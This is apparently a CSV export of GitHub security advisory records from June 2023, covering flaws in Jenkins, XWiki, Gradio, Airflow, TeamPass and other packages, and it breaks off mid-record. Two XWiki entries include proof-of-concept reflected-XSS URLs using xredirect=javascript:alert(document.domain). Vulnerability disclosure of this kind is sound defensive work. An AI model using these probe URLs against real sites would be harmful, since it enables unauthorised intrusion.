validation,"Jenkins Team Concert Plugin 2.4.1 and earlier does not perform permission checks in methods implementing form validation. This allows attackers with Overall/Read permission to check for the existence of an attacker-specified file path on the Jenkins controller file system. Team Concert Plugin 2.4.2 requires Overall/Administer permission for the affected form validation methods.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:teamconcert'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3315'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-06-14/#SECURITY-2932'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:35:50Z', 'nvd_published_at': None}" 1.4.0,GHSA-8vm8-38pc-8xhh,2023-06-09T16:52:45Z,2023-06-03T12:30:14Z,,['CVE-2023-3084'],TeamPass vulnerable to stored Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3084'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/61b9b7d4e33bbaad2cd61a7ee988f9c22298bf1a'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4b86b56b-c51b-4be8-8ee4-6e385d1e9e8a'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:05:45Z', 'nvd_published_at': None}" 1.4.0,GHSA-g75c-cjr6-39mc,2023-06-20T16:44:55Z,2023-06-20T16:44:55Z,,['CVE-2023-34465'],XWiki Platform's Mail.MailConfig can be edited by any user with edit rights,"### Impact `Mail.MailConfig` can be edited by any logged-in user by default. Consequently, they can: - change the mail obfuscation configuration - view and edit the mail sending configuration, including the smtp domain name and credentials. ### Patches The problem has been patched on XWiki 14.4.8, 15.1, and 14.10.6. ### Workarounds The rights of the `Mail.MailConfig` page can be manually updated so that only a set of trusted users can view, edit and delete it (e.g., the `XWiki.XWikiAdminGroup` group). On 14.4.8+, 15.1-rc-1+, or 14.10.5+, if at startup `Mail.MailConfig` does not have any rights defined, `view`, `edit ` and `delete` rights are automatically granted to the `XWiki.XWikiAdminGroup` group. See the corresponding [patch](https://github.com/xwiki/xwiki-platform/commit/d28d7739089e1ae8961257d9da7135d1a01cb7d4). ### References - https://jira.xwiki.org/browse/XWIKI-20519 + https://jira.xwiki.org/browse/XWIKI-20671 - https://github.com/xwiki/xwiki-platform/commit/d28d7739089e1ae8961257d9da7135d1a01cb7d4 - https://github.com/xwiki/xwiki-platform/commit/8910b8857d3442d2e8142f655fdc0512930354d1 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-mail-send-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.8-rc-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-mail-send-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-mail-send-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-g75c-cjr6-39mc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34465'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/8910b8857d3442d2e8142f655fdc0512930354d1'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/d28d7739089e1ae8961257d9da7135d1a01cb7d4'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20519'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20671'}]","{'cwe_ids': ['CWE-269'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:44:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-3p2q-mh7q-9pxj,2023-06-19T20:16:20Z,2023-06-19T03:30:19Z,2023-06-19T20:16:20Z,[],Duplicate Advisory: elFinder vulnerable to path traversal in LocalVolumeDriver connector,"### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-wm5g-p99q-66g4. This link is maintained to preserve external references. ### Original Description _joinPath in elFinderVolumeLocalFileSystem.class.php in elFinder before 2.1.62 allows path traversal in the PHP LocalVolumeDriver connector.",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'studio-42/elfinder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.62'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/security/advisories/GHSA-wm5g-p99q-66g4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35840'}, {'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/commit/bb9aaa7b096a1b83f2f85657c43f12131ece2891'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T20:16:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-cvgc-465m-cw9g,2023-06-19T22:46:38Z,2023-06-19T06:30:42Z,,['CVE-2023-34603'],JeecgBoot vulnerable to SQL injection in queryFilterTableDictInfo,JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component `queryFilterTableDictInfo` in method `org.jeecg.modules.api.controller.SystemApiController`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34603'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/4984'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:46:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-8qxh-2gh8-r923,2023-06-12T18:34:26Z,2023-06-12T18:34:26Z,,[],"cheqd-node subject to Cosmos SDK ""Barberry"" vulnerability","### Impact This [vulnerability dubbed ""Barberry"" affects the Cosmos SDK framework](https://forum.cosmos.network/t/cosmos-sdk-security-advisory-barberry/10825) used by `cheqd-node` as base. It impacts the way Cosmos SDK handles vesting accounts, and can therefore be a high-impact vulnerability for any network running the framework. There is no vulnerability in the DID/resource modules for `cheqd-node`. ### Patches Node operators are requested to upgrade to [cheqd-node v1.4.4](https://github.com/cheqd/cheqd-node/releases/tag/v1.4.4). This is not a state-breaking release and does not require a coordinated upgrade across all node operators. This vulnerability was patched in [Cosmos SDK v0.46.13](https://github.com/cosmos/cosmos-sdk/releases/tag/v0.46.13). Since this version switches to Go v1.19 and also changes the namespace of many Cosmos protobuf packages, the Barberry fix was [backported to cheqd's fork of Cosmos SDK](https://github.com/cheqd/cosmos-sdk/releases/tag/v0.46.10-barberry). ### Mitigation When at least ~**33**% of the voting power of the network has deployed the recommended version of the software, any attack would be unsuccessful but cause a chain halt. Once at least ~**67**% of the voting power of the network has deployed recommended version of the software, the attack would be unsuccessful _without_ a chain halt. ### Workarounds No. Node operators are recommended to upgrade to the latest release version. ### References - [""Barberry"" vulnerability security advisory](https://forum.cosmos.network/t/cosmos-sdk-security-advisory-barberry/10825) - [Cosmos SDK v0.46.13 release notes](https://github.com/cosmos/cosmos-sdk/releases/tag/v0.46.13) ",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/cheqd/cheqd-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cheqd/cheqd-node/security/advisories/GHSA-8qxh-2gh8-r923'}, {'type': 'WEB', 'url': 'https://forum.cosmos.network/t/cosmos-sdk-security-advisory-barberry/10825'}, {'type': 'PACKAGE', 'url': 'https://github.com/cheqd/cheqd-node'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/releases/tag/v0.46.13'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:34:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-3qqg-pgqq-3695,2023-06-09T22:51:19Z,2023-06-09T22:51:19Z,,['CVE-2023-34239'],Gradio vulnerable to arbitrary file read and proxying of arbitrary URLs,"### Impact There are two separate security vulnerabilities here: (1) a security vulnerability that allows users to read arbitrary files on the machines that are running shared Gradio apps (2) the ability of users to use machines that are sharing Gradio apps to proxy arbitrary URLs ### Patches Both problems have been solved, please upgrade `gradio` to `3.34.0` or higher ### Workarounds Not possible to workaround except by taking down any shared Gradio apps ### References Relevant PRs: * https://github.com/gradio-app/gradio/pull/4406 * https://github.com/gradio-app/gradio/pull/4370","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'gradio'}, 'ecosystem_specific': {'affected_functions': ['gradio.blocks.Blocks.from_config', 'gradio.blocks.Blocks.render']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.34.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.33.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/gradio-app/gradio/security/advisories/GHSA-3qqg-pgqq-3695'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34239'}, {'type': 'WEB', 'url': 'https://github.com/gradio-app/gradio/pull/4370'}, {'type': 'WEB', 'url': 'https://github.com/gradio-app/gradio/pull/4406'}, {'type': 'WEB', 'url': 'https://github.com/gradio-app/gradio/commit/37967617bd97615fb6f3b44e7750c0e0be58479a#diff-324a7165f5d5a8823a28b76f5653fa45f32c8144c82b2e528882c97c7eae534f'}, {'type': 'WEB', 'url': 'https://github.com/gradio-app/gradio/commit/cd64130d54e678525774bbb200ef9c7166fa1543'}, {'type': 'PACKAGE', 'url': 'https://github.com/gradio-app/gradio'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/gradio/PYSEC-2023-90.yaml'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:51:19Z', 'nvd_published_at': None}" 1.4.0,GHSA-pm73-x2h5-cmj3,2023-07-05T17:16:47Z,2023-06-23T09:30:17Z,,['CVE-2023-31469'],Apache StreamPipes Improper Privilege Management vulnerability,"A REST interface in Apache StreamPipes (versions 0.69.0 to 0.91.0) was not properly restricted to admin-only access. This allowed a non-admin user with valid login credentials to elevate privileges beyond the initially assigned roles. The issue is resolved by upgrading to StreamPipes 0.92.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.streampipes:streampipes-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.69.0'}, {'fixed': '0.92.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31469'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/streampipes'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/c4y8kf9bzpf36v4bottfmd8tc9cxo19m'}]","{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:44:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-h87r-f4vc-mchv,2023-06-06T01:51:09Z,2023-06-06T01:51:09Z,,[],PocketMine-MP vulnerable to improperly checked dropped item count leading to server crash,"### Impact In 4.18.0, the network handling of inventories was completely revamped. Due to this, a bug was introduced which allowed players to request that the server drop more of an item than they had available in their hotbar. This did not lead to any duplication issues, but instead led to a server crash, and is believed to have been exploited in the wild. ### Patches This was fixed in 58974765a68f63a9968a7ff3a06f584ff2ee08d2, which was released in 4.18.1. ### Workarounds Handle `InventoryTransactionPacket` in `DataPacketReceiveEvent`, and verify that the item count dropped isn't more than the available item count. However, it's complicated to do this, so it's not recommended.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pocketmine/pocketmine-mp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.18.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/security/advisories/GHSA-h87r-f4vc-mchv'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/commit/58974765a68f63a9968a7ff3a06f584ff2ee08d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pmmp/PocketMine-MP'}, {'type': 'WEB', 'url': 'https://github.com/pmmp/PocketMine-MP/blob/4.18.1/changelogs/4.18.md#4181'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T01:51:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-9766-v29c-4vm7,2023-07-06T16:02:24Z,2023-06-27T12:30:42Z,,['CVE-2023-34395'],Apache Airflow ODBC Provider Argument Injection vulnerability,"Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Apache Software Foundation Apache Airflow ODBC Provider. In OdbcHook, A privilege escalation vulnerability exists in a system due to controllable ODBC driver parameters that allow the loading of arbitrary dynamic-link libraries, resulting in command execution. Starting version 4.0.0 driver can be set only from the hook constructor. This issue affects Apache Airflow ODBC Provider: before 4.0.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-odbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34395'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/31713'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/commit/2844dad1c762f5c7dd1271866d3661bf66657300'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/l26yykftzbhc9tgcph8cso88bc2lqwwd'}]","{'cwe_ids': ['CWE-88'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:26:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-66gv-5m8q-rrjc,2023-06-27T20:18:52Z,2023-06-14T15:30:38Z,,['CVE-2023-34614'],jsonij vulnerable to stack exhaustion,An issue was discovered jmarsden/jsonij through 0.5.2 allows attackers to cause a denial of service or other unspecified impacts via crafted objects that deeply nested structures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'cc.plural:jsonij'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34614'}, {'type': 'PACKAGE', 'url': 'https://bitbucket.org/jmarsden/jsonij'}, {'type': 'WEB', 'url': 'https://bitbucket.org/jmarsden/jsonij/issues/7/stack-overflow-error-caused-by-jsonij'}]","{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T20:49:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-x234-mg7q-m8g8,2023-06-22T19:59:47Z,2023-06-22T19:59:47Z,,['CVE-2023-35159'],XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in deletespace template,"### Impact Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: > xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain) This vulnerability exists since XWiki 3.4-milestone-1. ### Patches The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. ### Workarounds It's possible to workaround the vulnerability by editing the template deletespace.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets. ### References * Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20612 * Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583 * Commit containing the actual fix in the template: https://github.com/xwiki/xwiki-platform/commit/5c20ff5e3bdea50f1053fe99a27e011b8d0e4b34 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4-milestone-1'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-x234-mg7q-m8g8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35159'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/5c20ff5e3bdea50f1053fe99a27e011b8d0e4b34'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20583'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20612'}]","{'cwe_ids': ['CWE-79', 'CWE-87'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-qfh9-8p57-mjjj,2023-06-12T18:55:56Z,2023-06-12T15:30:28Z,,['CVE-2023-33290'],git-url-parse crate vulnerable to Regular Expression Denial of Service,"The git-url-parse crate through 0.4.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to `normalize_url` in `lib.rs`, a similar issue to CVE-2023-32758 (Python).",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'git-url-parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33290'}, {'type': 'WEB', 'url': 'https://github.com/tjtelan/git-url-parse-rs/issues/51'}, {'type': 'PACKAGE', 'url': 'https://github.com/tjtelan/git-url-parse-rs'}, {'type': 'WEB', 'url': 'https://github.com/tjtelan/git-url-parse-rs/blob/main/src/lib.rs#L396'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:55:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-4xm7-5q79-3fch,2023-06-22T20:00:00Z,2023-06-22T20:00:00Z,,['CVE-2023-35161'],XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in DeleteApplication page,"### Impact Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the DeleteApplication page to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/AppWithinMinutes/DeleteApplication?appName=Menu&resolve=true&xredirect=javascript:alert(document.domain) This vulnerability exists since XWiki 6.2-milestone-1. ### Patches The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. ### Workarounds It's possible to workaround the vulnerability by editing the page AppWithinMinutes.DeleteApplication to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets. ### References * Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20614 * Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583 * Commit containing the actual fix in the page: https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-appwithinminutes-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2-milestone-1'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-appwithinminutes-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-4xm7-5q79-3fch'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35161'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20583'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20614'}]","{'cwe_ids': ['CWE-79', 'CWE-87'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:00:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-g3hh-q55f-9g3w,2023-06-09T22:42:22Z,2023-06-08T15:30:20Z,,['CVE-2023-3163'],RuoYi Uncontrolled Resource Consumption vulnerability,A vulnerability was found in y_project RuoYi up to 4.7.7. It has been classified as problematic. Affected is the function filterKeyword. The manipulation of the argument value leads to resource consumption. VDB-231090 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.ruoyi:ruoyi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.7.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3163'}, {'type': 'PACKAGE', 'url': 'https://gitee.com/y_project/RuoYi'}, {'type': 'WEB', 'url': 'https://gitee.com/y_project/RuoYi/issues/I78DOR'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.231090'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.231090'}]","{'cwe_ids': ['CWE-400', 'CWE-89'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:42:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-fm68-j7ww-h9xf,2023-06-30T20:41:57Z,2023-06-30T20:41:57Z,,['CVE-2023-36470'],XWiki Platform vulnerable to Code Injection in icon themes,"### Impact By either creating a new or editing an existing document with an icon set, an attacker can inject XWiki syntax and Velocity code that is executed with programming rights and thus allows remote code execution. There are different attack vectors, the simplest is the Velocity code in the icon set's HTML or XWiki syntax definition. The [icon picker](https://extensions.xwiki.org/xwiki/bin/view/Extension/Icon%20Theme%20Application#HIconPicker) can be used to trigger the rendering of any icon set. The XWiki syntax variant of the icon set is also used without any escaping in some documents, allowing to inject XWiki syntax including script macros into a document that might have programming right, for this the currently used icon theme needs to be edited. Further, the HTML output of the icon set is output as JSON in the icon picker and this JSON is interpreted as XWiki syntax, allowing again the injection of script macros into a document with programming right and thus allowing remote code execution. This impacts the confidentiality, integrity and availability of the whole XWiki instance. ### Patches This has been patched in XWiki 14.10.6 and 15.1. Icon themes now require script right and the code in the icon theme is executed within the context of the icon theme, preventing any rights escalation. A macro for displaying icons has been introduced to avoid injecting the raw wiki syntax of an icon set into another document. ### Workarounds There are no workarounds apart from upgrading to a version containing the fix. ### References * https://jira.xwiki.org/browse/XWIKI-20524 * https://github.com/xwiki/xwiki-platform/commit/b0cdfd893912baaa053d106a92e39fa1858843c7 * https://github.com/xwiki/xwiki-platform/commit/46b542854978e9caa687a5c2b8817b8b17877d94 * https://github.com/xwiki/xwiki-platform/commit/79418dd92ca11941b46987ef881bf50424898ff4 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2-milestone-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2-milestone-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-default'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2-milestone-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-fm68-j7ww-h9xf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36470'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/46b542854978e9caa687a5c2b8817b8b17877d94'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/79418dd92ca11941b46987ef881bf50424898ff4'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/b0cdfd893912baaa053d106a92e39fa1858843c7'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20524'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:41:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-fp7h-f9f5-x4q7,2023-06-20T16:44:35Z,2023-06-20T16:44:35Z,,['CVE-2023-34464'],XWiki vulnerable to stored cross-site scripting via any wiki document and the displaycontent/rendercontent template,"### Impact Any user who can edit a document in a wiki like the user profile can create a stored XSS attack by putting plain HTML code into that document and then tricking another user to visit that document with the `displaycontent` or `rendercontent` template and plain output syntax. For example, edit any document with the wiki editor and set the content to `` , save and then append the parameters `?viewer=displaycontent&sheet=&outputSyntax=plain`. If this displays an alert, the installation is vulnerable. If a user with programming rights is tricked into visiting such a URL, arbitrary actions be performed with this user's rights, impacting the confidentiality, integrity, and availability of the whole XWiki installation. ### Patches This has been patched in XWiki 